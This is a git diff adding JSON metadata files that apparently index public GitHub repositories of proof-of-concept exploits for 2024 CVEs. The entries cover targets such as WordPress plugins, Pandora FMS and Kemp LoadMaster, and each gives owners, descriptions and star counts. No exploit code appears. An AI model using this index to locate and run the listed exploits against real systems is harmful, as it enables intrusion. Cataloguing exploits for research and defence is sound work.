"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41403864?v=4", + "html_url": "https:\/\/github.com\/NSQAQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSQAQ\/CVE-2024-11201", + "description": "TEST", + "fork": false, + "created_at": "2024-11-23T09:00:58Z", + "updated_at": "2024-11-23T09:01:02Z", + "pushed_at": "2024-11-23T09:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11252.json b/2024/CVE-2024-11252.json new file mode 100644 index 0000000000..f95865560b --- /dev/null +++ b/2024/CVE-2024-11252.json @@ -0,0 +1,33 @@ +[ + { + "id": 896497712, + "name": "CVE-2024-11252-Sassy-Social-Share-XSS", + "full_name": "reinh3rz\/CVE-2024-11252-Sassy-Social-Share-XSS", + "owner": { + "login": "reinh3rz", + "id": 144375735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144375735?v=4", + "html_url": "https:\/\/github.com\/reinh3rz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reinh3rz\/CVE-2024-11252-Sassy-Social-Share-XSS", + "description": null, + "fork": false, + "created_at": "2024-11-30T14:20:57Z", + "updated_at": "2024-11-30T14:30:34Z", + "pushed_at": "2024-11-30T14:30:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11281.json b/2024/CVE-2024-11281.json new file mode 100644 index 0000000000..3ff8dd3604 --- /dev/null +++ b/2024/CVE-2024-11281.json @@ -0,0 +1,33 @@ +[ + { + "id": 908326183, + "name": "CVE-2024-11281", + "full_name": "McTavishSue\/CVE-2024-11281", + "owner": { + "login": "McTavishSue", + "id": 186207823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186207823?v=4", + "html_url": "https:\/\/github.com\/McTavishSue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/McTavishSue\/CVE-2024-11281", + "description": "Missing Authorization (CWE-862)", + "fork": false, + "created_at": "2024-12-25T18:38:46Z", + "updated_at": "2025-01-03T05:35:27Z", + "pushed_at": "2024-12-25T18:49:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11318.json b/2024/CVE-2024-11318.json new file mode 100644 index 0000000000..d7c24c0692 --- /dev/null +++ b/2024/CVE-2024-11318.json @@ -0,0 +1,40 @@ +[ + { + "id": 803988373, + "name": "CVE-2024-11318", + "full_name": "xthalach\/CVE-2024-11318", + "owner": { + "login": "xthalach", + "id": 73621025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73621025?v=4", + "html_url": "https:\/\/github.com\/xthalach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xthalach\/CVE-2024-11318", + "description": "This repository details an IDOR vulnerability in AbsysNet 2.3.1, which allows a remote attacker to brute-force session IDs via the \/cgi-bin\/ocap\/ endpoint. Successful exploitation can compromise active user sessions, exposing authentication tokens in HTML. The attack is limited to active sessions and is terminated if the user logs out.", + "fork": false, + "created_at": "2024-05-21T18:35:35Z", + "updated_at": "2024-11-25T14:35:05Z", + "pushed_at": "2024-11-24T23:08:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "absysnet", + "authentication-bypass", + "cve-2024-11318", + "exploit", + "hijacking", + "idor-attack" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11320.json b/2024/CVE-2024-11320.json new file mode 100644 index 0000000000..8bd592cb6c --- /dev/null +++ b/2024/CVE-2024-11320.json @@ -0,0 +1,33 @@ +[ + { + "id": 896840057, + "name": "CVE-2024-11320", + "full_name": "mhaskar\/CVE-2024-11320", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2024-11320", + "description": "Exploit for Pandora FMS Remote Code Execution CVE-2024-11320", + "fork": false, + "created_at": "2024-12-01T12:39:49Z", + "updated_at": "2025-01-06T14:55:16Z", + "pushed_at": "2024-12-01T12:48:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11381.json b/2024/CVE-2024-11381.json new file mode 100644 index 0000000000..e6bdae6137 --- /dev/null +++ b/2024/CVE-2024-11381.json @@ -0,0 +1,33 @@ +[ + { + "id": 892726115, + "name": "CVE-2024-11381", + "full_name": "windz3r0day\/CVE-2024-11381", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11381", + "description": "CVE-2024-11381 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:53:14Z", + "updated_at": "2024-11-22T17:22:38Z", + "pushed_at": "2024-11-22T16:54:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11387.json b/2024/CVE-2024-11387.json new file mode 100644 index 0000000000..f8495f86b2 --- /dev/null +++ b/2024/CVE-2024-11387.json @@ -0,0 +1,33 @@ +[ + { + "id": 893617166, + "name": "CVE-2024-11387", + "full_name": "windz3r0day\/CVE-2024-11387", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11387", + "description": "CVE-2024-11387 poc exploit", + "fork": false, + "created_at": "2024-11-24T22:14:03Z", + "updated_at": "2024-11-25T08:04:10Z", + "pushed_at": "2024-11-24T22:15:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11388.json b/2024/CVE-2024-11388.json new file mode 100644 index 0000000000..81da15ff8b --- /dev/null +++ b/2024/CVE-2024-11388.json @@ -0,0 +1,33 @@ +[ + { + "id": 892723947, + "name": "CVE-2024-11388", + "full_name": "windz3r0day\/CVE-2024-11388", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11388", + "description": "CVE-2024-11388 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:48:21Z", + "updated_at": "2024-11-22T17:22:12Z", + "pushed_at": "2024-11-22T16:49:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11392.json b/2024/CVE-2024-11392.json new file mode 100644 index 0000000000..1eccf66353 --- /dev/null +++ b/2024/CVE-2024-11392.json @@ -0,0 +1,33 @@ +[ + { + "id": 899915043, + "name": "CVE-2024-11392", + "full_name": "Piyush-Bhor\/CVE-2024-11392", + "owner": { + "login": "Piyush-Bhor", + "id": 131725874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131725874?v=4", + "html_url": "https:\/\/github.com\/Piyush-Bhor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Piyush-Bhor\/CVE-2024-11392", + "description": "Technical Details and Exploit for CVE-2024-11392", + "fork": false, + "created_at": "2024-12-07T11:14:21Z", + "updated_at": "2024-12-07T11:23:00Z", + "pushed_at": "2024-12-07T11:22:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11393.json b/2024/CVE-2024-11393.json new file mode 100644 index 0000000000..be430f2158 --- /dev/null +++ b/2024/CVE-2024-11393.json @@ -0,0 +1,33 @@ +[ + { + "id": 899917856, + "name": "CVE-2024-11393", + "full_name": "Piyush-Bhor\/CVE-2024-11393", + "owner": { + "login": "Piyush-Bhor", + "id": 131725874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131725874?v=4", + "html_url": "https:\/\/github.com\/Piyush-Bhor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Piyush-Bhor\/CVE-2024-11393", + "description": "Technical Details and Exploit for CVE-2024-11393", + "fork": false, + "created_at": "2024-12-07T11:24:06Z", + "updated_at": "2024-12-10T04:18:23Z", + "pushed_at": "2024-12-08T00:31:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11394.json b/2024/CVE-2024-11394.json new file mode 100644 index 0000000000..a079dc0e7e --- /dev/null +++ b/2024/CVE-2024-11394.json @@ -0,0 +1,33 @@ +[ + { + "id": 899918238, + "name": "CVE-2024-11394", + "full_name": "Piyush-Bhor\/CVE-2024-11394", + "owner": { + "login": "Piyush-Bhor", + "id": 131725874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131725874?v=4", + "html_url": "https:\/\/github.com\/Piyush-Bhor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Piyush-Bhor\/CVE-2024-11394", + "description": "Technical Details and Exploit for CVE-2024-11394", + "fork": false, + "created_at": "2024-12-07T11:25:32Z", + "updated_at": "2024-12-08T00:46:49Z", + "pushed_at": "2024-12-08T00:46:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11412.json b/2024/CVE-2024-11412.json new file mode 100644 index 0000000000..7f6614a469 --- /dev/null +++ b/2024/CVE-2024-11412.json @@ -0,0 +1,33 @@ +[ + { + "id": 892724705, + "name": "CVE-2024-11412", + "full_name": "windz3r0day\/CVE-2024-11412", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11412", + "description": "CVE-2024-11412 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:50:08Z", + "updated_at": "2024-11-22T17:22:26Z", + "pushed_at": "2024-11-22T16:51:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11428.json b/2024/CVE-2024-11428.json new file mode 100644 index 0000000000..b630dd8f2d --- /dev/null +++ b/2024/CVE-2024-11428.json @@ -0,0 +1,33 @@ +[ + { + "id": 892725472, + "name": "CVE-2024-11428", + "full_name": "windz3r0day\/CVE-2024-11428", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11428", + "description": "CVE-2024-11428 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:51:47Z", + "updated_at": "2024-11-22T17:22:29Z", + "pushed_at": "2024-11-22T16:52:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11432.json b/2024/CVE-2024-11432.json new file mode 100644 index 0000000000..8d25ebcc56 --- /dev/null +++ b/2024/CVE-2024-11432.json @@ -0,0 +1,33 @@ +[ + { + "id": 892723142, + "name": "CVE-2024-11432", + "full_name": "windz3r0day\/CVE-2024-11432", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11432", + "description": "CVE-2024-11432 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:46:24Z", + "updated_at": "2024-11-22T17:22:05Z", + "pushed_at": "2024-11-22T16:47:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11477.json b/2024/CVE-2024-11477.json new file mode 100644 index 0000000000..135e718758 --- /dev/null +++ b/2024/CVE-2024-11477.json @@ -0,0 +1,33 @@ +[ + { + "id": 895895052, + "name": "cve-2024-11477-writeup", + "full_name": "TheN00bBuilder\/cve-2024-11477-writeup", + "owner": { + "login": "TheN00bBuilder", + "id": 41171807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41171807?v=4", + "html_url": "https:\/\/github.com\/TheN00bBuilder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheN00bBuilder\/cve-2024-11477-writeup", + "description": "CVE-2024-11477 7Zip Code Execution Writeup and Analysis", + "fork": false, + "created_at": "2024-11-29T06:13:36Z", + "updated_at": "2025-01-02T02:40:25Z", + "pushed_at": "2024-12-04T01:01:28Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 48, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11616.json b/2024/CVE-2024-11616.json new file mode 100644 index 0000000000..d960428471 --- /dev/null +++ b/2024/CVE-2024-11616.json @@ -0,0 +1,33 @@ +[ + { + "id": 909318592, + "name": "CVE-2024-11616", + "full_name": "inb1ts\/CVE-2024-11616", + "owner": { + "login": "inb1ts", + "id": 87979502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87979502?v=4", + "html_url": "https:\/\/github.com\/inb1ts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inb1ts\/CVE-2024-11616", + "description": "Crash PoC for exploiting Netskope Endpoint DLP double-fetch.", + "fork": false, + "created_at": "2024-12-28T10:48:23Z", + "updated_at": "2025-01-02T14:47:02Z", + "pushed_at": "2024-12-28T11:39:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11643.json b/2024/CVE-2024-11643.json new file mode 100644 index 0000000000..a649507984 --- /dev/null +++ b/2024/CVE-2024-11643.json @@ -0,0 +1,36 @@ +[ + { + "id": 898924664, + "name": "CVE-2024-11643", + "full_name": "RandomRobbieBF\/CVE-2024-11643", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-11643", + "description": "Accessibility by AllAccessible <= 1.3.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Option Update", + "fork": false, + "created_at": "2024-12-05T09:47:31Z", + "updated_at": "2025-01-06T13:39:02Z", + "pushed_at": "2024-12-05T09:49:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-11643", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11680.json b/2024/CVE-2024-11680.json new file mode 100644 index 0000000000..eb2efdeffd --- /dev/null +++ b/2024/CVE-2024-11680.json @@ -0,0 +1,33 @@ +[ + { + "id": 898635585, + "name": "CVE-2024-11680_PoC_Exploit", + "full_name": "D3N14LD15K\/CVE-2024-11680_PoC_Exploit", + "owner": { + "login": "D3N14LD15K", + "id": 155617205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155617205?v=4", + "html_url": "https:\/\/github.com\/D3N14LD15K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D3N14LD15K\/CVE-2024-11680_PoC_Exploit", + "description": "This repository contains a Proof of Concept (PoC) exploit for CVE-2024-11680, a critical vulnerability in ProjectSend r1605 and older versions. The exploit targets a Cross-Site Request Forgery (CSRF) flaw in combination with Privilege Misconfiguration issues.", + "fork": false, + "created_at": "2024-12-04T18:42:43Z", + "updated_at": "2024-12-16T10:01:06Z", + "pushed_at": "2024-12-11T23:45:31Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11728.json b/2024/CVE-2024-11728.json new file mode 100644 index 0000000000..2b4a9f9797 --- /dev/null +++ b/2024/CVE-2024-11728.json @@ -0,0 +1,33 @@ +[ + { + "id": 901848070, + "name": "CVE-2024-11728", + "full_name": "samogod\/CVE-2024-11728", + "owner": { + "login": "samogod", + "id": 81412659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81412659?v=4", + "html_url": "https:\/\/github.com\/samogod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/samogod\/CVE-2024-11728", + "description": "KiviCare – Clinic & Patient Management System (EHR) WordPress Plugin Unauthenticated SQL Injection PoC", + "fork": false, + "created_at": "2024-12-11T12:33:46Z", + "updated_at": "2024-12-11T15:11:30Z", + "pushed_at": "2024-12-11T15:11:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11972.json b/2024/CVE-2024-11972.json new file mode 100644 index 0000000000..df9469e1ce --- /dev/null +++ b/2024/CVE-2024-11972.json @@ -0,0 +1,33 @@ +[ + { + "id": 903941456, + "name": "exploit-CVE-2024-11972", + "full_name": "JunTakemura\/exploit-CVE-2024-11972", + "owner": { + "login": "JunTakemura", + "id": 76585599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76585599?v=4", + "html_url": "https:\/\/github.com\/JunTakemura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JunTakemura\/exploit-CVE-2024-11972", + "description": "Exploit for CVE-2024-11972, Hunk Companion < 1.9.0 Unauthenticated Plugin Installation", + "fork": false, + "created_at": "2024-12-15T23:54:15Z", + "updated_at": "2024-12-28T16:44:18Z", + "pushed_at": "2024-12-28T16:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12025.json b/2024/CVE-2024-12025.json new file mode 100644 index 0000000000..5aa7dbf234 --- /dev/null +++ b/2024/CVE-2024-12025.json @@ -0,0 +1,33 @@ +[ + { + "id": 905785373, + "name": "CVE-2024-12025", + "full_name": "RandomRobbieBF\/CVE-2024-12025", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-12025", + "description": "Collapsing Categories <= 3.0.8 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-12-19T14:15:29Z", + "updated_at": "2024-12-31T06:46:57Z", + "pushed_at": "2024-12-19T14:16:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1207.json b/2024/CVE-2024-1207.json new file mode 100644 index 0000000000..1f9abf4417 --- /dev/null +++ b/2024/CVE-2024-1207.json @@ -0,0 +1,33 @@ +[ + { + "id": 869417848, + "name": "CVE-2024-1207", + "full_name": "sahar042\/CVE-2024-1207", + "owner": { + "login": "sahar042", + "id": 49879157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49879157?v=4", + "html_url": "https:\/\/github.com\/sahar042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahar042\/CVE-2024-1207", + "description": "The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attac", + "fork": false, + "created_at": "2024-10-08T09:05:16Z", + "updated_at": "2024-10-08T09:16:33Z", + "pushed_at": "2024-10-08T09:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1208.json b/2024/CVE-2024-1208.json new file mode 100644 index 0000000000..1476b64fa7 --- /dev/null +++ b/2024/CVE-2024-1208.json @@ -0,0 +1,75 @@ +[ + { + "id": 753221507, + "name": "CVE-2024-1208-and-CVE-2024-1210", + "full_name": "karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210", + "description": "Sensitive Information Exposure via API in LearnDash.", + "fork": false, + "created_at": "2024-02-05T17:46:41Z", + "updated_at": "2024-03-04T17:31:59Z", + "pushed_at": "2024-02-05T17:58:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808264498, + "name": "CVE-2024-1208", + "full_name": "Cappricio-Securities\/CVE-2024-1208", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-1208", + "description": "LearnDash LMS < 4.10.3 - Sensitive Information Exposure", + "fork": false, + "created_at": "2024-05-30T17:55:45Z", + "updated_at": "2024-06-27T14:28:24Z", + "pushed_at": "2024-06-24T09:52:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-1208", + "cve-2024-1208-exploit", + "cve-2024-1208-poc", + "cve-2024-1208-scanner", + "learndash-lms", + "learndash-lms-4-10-3-exploit", + "sensitive-information-exposure" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1209.json b/2024/CVE-2024-1209.json new file mode 100644 index 0000000000..c4e43e2320 --- /dev/null +++ b/2024/CVE-2024-1209.json @@ -0,0 +1,33 @@ +[ + { + "id": 753219299, + "name": "CVE-2024-1209", + "full_name": "karlemilnikka\/CVE-2024-1209", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1209", + "description": "Sensitive Information Exposure via assignments in LearnDash. ", + "fork": false, + "created_at": "2024-02-05T17:41:47Z", + "updated_at": "2024-04-02T03:25:31Z", + "pushed_at": "2024-02-05T17:56:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1212.json b/2024/CVE-2024-1212.json new file mode 100644 index 0000000000..4c4d82d970 --- /dev/null +++ b/2024/CVE-2024-1212.json @@ -0,0 +1,95 @@ +[ + { + "id": 774632757, + "name": "CVE-2024-1212", + "full_name": "Chocapikk\/CVE-2024-1212", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-1212", + "description": "Unauthenticated Command Injection In Progress Kemp LoadMaster", + "fork": false, + "created_at": "2024-03-19T22:23:18Z", + "updated_at": "2024-12-30T13:06:11Z", + "pushed_at": "2024-03-19T22:25:21Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 852349830, + "name": "CVE-2024-1212", + "full_name": "nak000\/CVE-2024-1212", + "owner": { + "login": "nak000", + "id": 169058475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169058475?v=4", + "html_url": "https:\/\/github.com\/nak000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nak000\/CVE-2024-1212", + "description": null, + "fork": false, + "created_at": "2024-09-04T16:50:08Z", + "updated_at": "2024-09-04T16:50:08Z", + "pushed_at": "2024-09-04T12:35:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 908236253, + "name": "Exploiting-RCE-Cyber_Project_CVE-2024-1212", + "full_name": "Rehan07-Human\/Exploiting-RCE-Cyber_Project_CVE-2024-1212", + "owner": { + "login": "Rehan07-Human", + "id": 192799473, + "avatar_url": 